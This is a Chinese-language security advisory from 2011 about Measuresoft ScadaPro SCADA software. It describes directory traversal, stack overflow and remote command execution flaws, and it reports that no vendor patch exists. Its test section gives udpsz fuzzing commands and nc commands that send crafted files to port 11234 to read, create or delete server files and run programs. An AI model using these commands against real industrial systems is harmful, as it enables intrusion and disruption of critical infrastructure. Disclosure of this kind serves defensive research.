发布日期:2011-09-13
更新日期:2011-09-13
受影响系统:
Measuresoft scada
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49613
ScadaPro是用于MS Windwos的实时数据捕获软件。
Measuresoft ScadaPro在实现上存在多个安全漏洞,远程攻击者可利用这些漏洞使用目录遍历字符串执行非法操作或执行任意代码或命令,可能造成拒绝服务。该软件中的大部分支持命令中存在栈溢出漏洞和拒绝服务漏洞。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Luigi Auriemma (aluigi@pivx.com)提供了如下测试方法:
only a simple scanner:
udpsz -d 2 -c "xx%" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
udpsz -d 2 -c "xx%test\t" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
udpsz -d 2 -c "xx%test," -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
nc SERVER 11234 < scadapro_1b.dat ; read c:\boot.ini
nc SERVER 11234 < scadapro_1c.dat ; create c:\evil_file.txt
nc SERVER 11234 < scadapro_1d.dat ; delete c:\valid_file.txt
nc SERVER 11234 < scadapro_1e.dat ; execute notepad
建议:
--------------------------------------------------------------------------------
厂商补丁:
Measuresoft
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: